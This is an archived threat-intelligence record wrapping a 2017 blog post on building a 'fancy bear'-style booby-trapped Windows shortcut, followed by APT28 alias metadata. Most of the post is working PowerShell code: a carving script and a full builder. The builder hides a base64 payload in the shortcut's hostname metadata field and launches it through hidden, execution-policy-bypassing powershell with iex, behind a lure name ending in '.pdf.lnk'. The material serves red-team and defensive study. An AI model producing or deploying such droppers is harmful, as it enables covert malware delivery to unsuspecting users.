{
	"id": "ca0edb95-d102-42fa-9fab-7c80b4a2aa76",
	"created_at": "2026-04-29T02:21:32.046646Z",
	"updated_at": "2026-04-29T08:22:25.512494Z",
	"deleted_at": null,
	"sha1_hash": "d875b720ccd613fbc1e75af0cb19acf4a6ea88e1",
	"title": "Booby trap a shortcut with a backdoor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 790232,
	"plain_text": "Booby trap a shortcut with a backdoor\r\nBy Felix Weyne\r\nArchived: 2026-04-29 02:09:37 UTC\r\nThe Wayback Machine - https://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\n Posted by Felix, April 2017.\r\n Author contact: Twitter | Mail | LinkedIn\r\n Tags: booby trapped shortcut, penetration testing, fancy bear APT, red team exercise, lnk file, powershell, shortcut backdoor\r\nEmbedding a shortcut (.lnk file) which points to powershell (accompanied by an encoded command) in a Word document or zip file is a known sneaky trick to spread malware. The trick was allegedly also used by a Russian APT group called grizzly bear (source: Volexity, CrowdStrike), the same group that is allegedly responsible for hacking and influencing the American elections in 2016. The alleged booby trapped shortcut used by fancy bear against research institutes contains a feature that I haven't seen before. The shortcut not only calls powershell with an encoded command, but it also embeds an entire payload which isn't stored in the encoded command. Instead, the payload is stored in a hidden property field of the shortcut.\r\nStudying and reverse engineering this sample is very useful for red team penetration testers (people who challenge the defense of their own infrastructure in order to identify shortcomings and suggest possible improvements). In this blog I will explain how to create a 'fancy bear' like booby trapped shortcut. This dropper can be used for penetration testing purposes.\r\nhttps://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\nPage 1 of 9\n\nThe dropper has three distinguishable parts; these are visualized on image one and will be discussed throughout the blog.\r\nImage one: Three parts of the booby trapped shortcut: shortcut target set to powershell, carving script and embedded payload.\r\nCircumventing the target length limitation\r\nCreating a shortcut in Windows is very straightforward: right click on the desktop, and select 'New, shortcut'. A dialog window will pop up to ask you the location of the object. Once the shortcut is created, we can inspect its properties and add parameters to the target of the shortcut, as shown on image two.\r\nThe number of characters in the target field of the GUI properties window is limited to two hundred sixty (260) characters. Because of the character limitation, we can only make the shortcut point to, for instance, the powershell executable (in order to create a backdoor with the shortcut), with a tiny encoded command added as a parameter.\r\nImage two: (Top:) Shortcut's target path, as shown in the shortcut's properties GUI \u0026 a hex editor. (Bottom:) Extending the target character limitation via jscript.\r\nThe maximum target length can be extended though by creating the shortcut via a jscript making use of the 'WScript Shell' object. The GUI properties window will still clip the target field at two hundred sixty characters, but the 'WScript Shell' object will only clip the target parameter at one thousand ninety-six (1096) characters. The full target path can be inspected by opening the shortcut in a hex editor, as shown on image two.\r\nAbusing the LNK format\r\nAlthough we have found a way to extend the shortcut target length and thus the length of the parameter passed to powershell, this still isn't long enough to pass a large script block to powershell. 
The creators of the (allegedly Russian) malware detected by Volexity came to the same conclusion. They, however, had studied the Shell Link binary file format specification well.\r\nWhen a shortcut is created, a lot of metadata about the machine that created the shortcut is also stored inside the shortcut. Examples are the drive label and the hostname, as shown on image three (highlighted in red and green).\r\nImage three: (Top:) host artifacts hidden in the shortcut. (Bottom:) Extract of the Shell Link binary file format specification.\r\nWhen I inspected the link format specification, I noticed that some of these metadata fields may have a variable, unlimited length. An example of such a field is the hostname. The fact that the hostname stored in the shortcut may contain an arbitrarily long value makes it useful to store a large payload. This payload can be a large script block, something which the shortcut target field didn't allow us to store.\r\nCreating a booby trapped shortcut\r\nWith the information above, we now have the ingredients to craft a booby trapped shortcut. The backdoored shortcut can be created in any programming language; I have chosen powershell as my scripting language. The booby trapped shortcut will consist of three main parts, as shown on image one.\r\nFor the first part we need to create a carving script: a powershell script which will look for the embedded payload inside the shortcut. The carving script will be saved as an encoded parameter to powershell in the shortcut's target field. When a user opens the shortcut (the lnk file), the carving script will be executed. This carving script will look for the stored payload hidden in the hostname field. 
The carving script is shown below; you can see it being passed to powershell in the shortcut's target field on image four.\r\nImage four: Booby trapped shortcut looks like an innocent document until its properties are inspected.\r\n#--Carving script: will find and decode the script block\r\n#--embedded in the shortcut's hostname\r\n$payloadStartIndexInShortcut=1000;\r\n$payloadSize=100;\r\n$shortcutFilename=\"interesting-title.lnk\";\r\n#create a byte array to store the encoded payload\r\n$encodedPayloadBytes=New-Object byte[]($payloadSize);\r\n#read the contents of the shortcut, starting from $payloadStartIndexInShortcut\r\n$lnk=New-Object IO.FileStream $shortcutFilename,'Open','Read','ReadWrite';\r\n$lnk.Seek($payloadStartIndexInShortcut,[IO.SeekOrigin]::Begin);\r\n$lnk.Read($encodedPayloadBytes,0,$payloadSize);\r\n#Base64 decode encoded payload\r\n$decodedPayloadBytes=[Convert]::FromBase64CharArray($encodedPayloadBytes,0,$encodedPayloadBytes.Length);\r\n$scriptBlock=[Text.Encoding]::Unicode.GetString($decodedPayloadBytes);\r\n#execute payload (script block)\r\niex $scriptBlock;\r\nThe second goal is to create a shortcut which will link to powershell and pass the carving script. This shortcut will be created using the method to bypass the shortcut's target length limitation, as discussed earlier in this blog. The last goal is to actually write the payload: this payload is a powershell script which does not have any length limitations. The payload script can for instance contain a base64 encoded executable in a variable. This embedded executable can be written to disk or loaded into memory. The options for the payload are unlimited.\r\nThe result of the three goals combined can be found below. The result is a powershell script which creates a booby trapped shortcut, with a configurable payload. 
This script can be used for penetration testing purposes on systems where you have the permission to penetrate. The script may be copied as long as the script contains an attribution to the original author.\r\n#\r\n# Create backdoored LNK file - by Felix Weyne\r\n# Info: https://www.uperesia.com/booby-trapped-shortcut\r\n# -Usage: place your powershell payload in $payloadContents\r\n# -This payload can embed for instance an executable that needs\r\n# -to be dropped to disk/loaded into memory\r\n#\r\n$shortcutName = \"interesting-title-to-click-on.pdf.lnk\"\r\n$shortcutOutputPath = \"$Home\\Desktop\\\"+$shortcutName\r\n$shortcutFallbackExecutionFolder=\"`$env:temp\"\r\n$payloadContents =\r\n@'\r\n echo \"This payload/script block can be huge, easily a few megabytes\";\r\n echo $env:computername \u003e\u003e $Home\\Desktop\\IhaveRun.txt\r\n echo $env:computername \u003e\u003e $Home\\Desktop\\IhaveRun.txt\r\n'@\r\n$bytes = [System.Text.Encoding]::Unicode.GetBytes($payloadContents)\r\n$payload = [Convert]::ToBase64String($bytes)\r\nfunction Convert-ByteArrayToHexString($inputByteArray)\r\n{\r\n $String = [System.BitConverter]::ToString($inputByteArray)\r\n $String = $String -replace \"\\-\",\"\"\r\n $String\r\n}\r\nfunction Convert-HexStringToByteArray ($hexString) {\r\n $hexString = $hexString.ToLower()\r\n ,@($hexString -split '([a-f0-9]{2})' | foreach-object { if ($_) {[System.Convert]::ToByte($_,16)}})\r\n}\r\nfunction CreateShortcut($payloadStart,$payloadSize) {\r\n#\u003c------\u003e\r\n#\u003cPart 1: encode carving script\u003e\r\n#\u003c------\u003e\r\n#$stP = startPayload, $siP = sizePayload,\r\n#$scB = scriptblock, $lnk = filestream LNK file\r\n#$b64 = base64 encoded scriptblock, $f=shortcut name\r\n$carvingScript = @'\r\n$stP,$siP={0},{1};\r\n$f='{2}';\r\nif(-not(Test-Path $f)){{\r\n$x=Get-ChildItem -Path {3} -Filter $f -Recurse;\r\n[IO.Directory]::SetCurrentDirectory($x.DirectoryName);\r\n}}\r\n$lnk=New-Object IO.FileStream $f,'Open','Read','ReadWrite';\r\n$b64=New-Object byte[]($siP);\r\n$lnk.Seek($stP,[IO.SeekOrigin]::Begin);\r\n$lnk.Read($b64,0,$siP);\r\n$b64=[Convert]::FromBase64CharArray($b64,0,$b64.Length);\r\n$scB=[Text.Encoding]::Unicode.GetString($b64);\r\niex $scB;\r\n'@ -f $payloadStart,$payloadSize,$shortcutName,$shortcutFallbackExecutionFolder\r\n write-host \"Generated carving script:\" -foregroundcolor \"yellow\"\r\n echo $carvingScript;\r\n $compressedCarvingScript = $carvingScript -replace \"`n\",'' -replace \"`r\",''\r\n # Convert string to base64 encoded command\r\n $bytes = [System.Text.Encoding]::ASCII.GetBytes( $compressedCarvingScript )\r\n $encodedCommand = [Convert]::ToBase64String($bytes)\r\n \r\n #\u003c------\u003e\r\n #\u003cPart 2: create shortcut with encoded carving script\u003e\r\n #\u003c------\u003e\r\n $WshShell = New-Object -comObject WScript.Shell\r\n $Shortcut = $WshShell.CreateShortcut($shortcutOutputPath)\r\n $Shortcut.TargetPath = \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"\r\n $Shortcut.Arguments = \"-win hidden -Ep ByPass `$r = [Text.Encoding]::ASCII.GetString([Convert]::F\r\n $Shortcut.IconLocation = \"C:\\Windows\\system32\\SHELL32.dll, 1\"\r\n $Shortcut.Save()\r\n}\r\n#\u003c------\u003e\r\n#\u003cPart 3: find start of embedded payload (start of computer hostname)\u003e\r\n#\u003c------\u003e\r\nwrite-host \"Creating LNK with payload. This will enable us to see where the payload starts\" -foregrou\r\n$payloadSize = $payload.Length\r\nCreateShortcut 9999 $payloadSize\r\n$enc = [system.Text.Encoding]::UTF8\r\n[string]$computerName = $ENV:COMPUTERNAME\r\n$computerNameBytes = $enc.GetBytes($computerName.ToLower())\r\n$readin = [System.IO.File]::ReadAllBytes($shortcutOutputPath);\r\n$contentsLnkFile = (Convert-ByteArrayToHexString $readin) -join ''\r\n$computerNameInHex = (Convert-ByteArrayToHexString $computerNameBytes) -join ''\r\n$startPayload = ($contentsLnkFile.IndexOf($computerNameInHex)) / 2\r\nwrite-host \"Start of payload in LNK file is at byte: #\"$startPayload -foregroundcolor \"green\"\r\n#\u003c------\u003e\r\n#\u003cPart 4: create new link with correct start of payload\u003e\r\n#\u003c------\u003e\r\nRemove-Item $shortcutOutputPath\r\nCreateShortcut $startPayload $payloadSize\r\nwrite-host \"Output LNK file: \" $shortcutOutputPath -foregroundcolor \"Cyan\"\r\n#\u003c------\u003e\r\n#\u003cPart 5: embed payload\u003e\r\n#\u003c------\u003e\r\n$payloadBytes = $enc.GetBytes($payload)\r\n$payloadInHex = Convert-ByteArrayToHexString $payloadBytes\r\n$readin = [System.IO.File]::ReadAllBytes($shortcutOutputPath);\r\n$contentsLnkFile = (Convert-ByteArrayToHexString $readin) -join ''\r\n$contentsLnkFile = $contentsLnkFile -replace $computerNameInHex,$payloadInHex;\r\n$writeout = Convert-HexStringToByteArray $contentsLnkFile;\r\nset-content -value $writeout -encoding byte -path $shortcutOutputPath;\r\nReferences\r\nDemocratic National Committee cyber attacks, Wikipedia\r\nCrowdStrike linking fancy bear to Russia, The Washington Post\r\nBooby trapped shortcut used by fancy bear, Volexity\r\nMalicious shortcut sample sent by fancy bear to think tanks and NGOs (zipped, password=6190), VirusTotal\r\nLnk files spreading Kovter click-fraud trojan and Locky ransomware, Microsoft\r\nShell Link binary file format specification, Microsoft\r\nBear’s election campaign, in-depth analysis of the alleged Russian booby trapped shortcut\r\nGenerated booby trapped shortcut with the above script (ASCII Rick Astley)\r\nVirusTotal detection on booby trapped shortcut, generated with the powershell script in this blog\r\nSource: https://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut"
	],
	"report_names": [
		"booby-trapped-shortcut"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-29T06:58:56.194866Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Forest Blizzard",
				"STRONTIUM",
				"Blue Athena",
				"T-APT-12",
				"UAC-0028",
				"UAC-0001",
				"Fancy Bear",
				"TG-4127",
				"TA422",
				"Sofacy",
				"BlueDelta",
				"GruesomeLarch",
				"Pawn Storm",
				"FANCY BEAR",
				"SNAKEMACKEREL",
				"Group 74",
				"SIG40",
				"Grizzly Steppe",
				"Fighting Ursa",
				"ITG05",
				"Sednit",
				"Tsar Team",
				"IRON TWILIGHT",
				"G0007",
				"ATK5",
				"APT-C-20",
				"FROZENLAKE"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-29T06:58:57.48365Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-29T06:58:57.725302Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"LAMEHUG",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-29T06:58:58.181568Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1777429292,
	"ts_updated_at": 1777450945,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d875b720ccd613fbc1e75af0cb19acf4a6ea88e1.pdf",
		"text": "https://archive.orkl.eu/d875b720ccd613fbc1e75af0cb19acf4a6ea88e1.txt",
		"img": "https://archive.orkl.eu/d875b720ccd613fbc1e75af0cb19acf4a6ea88e1.jpg"
	}
}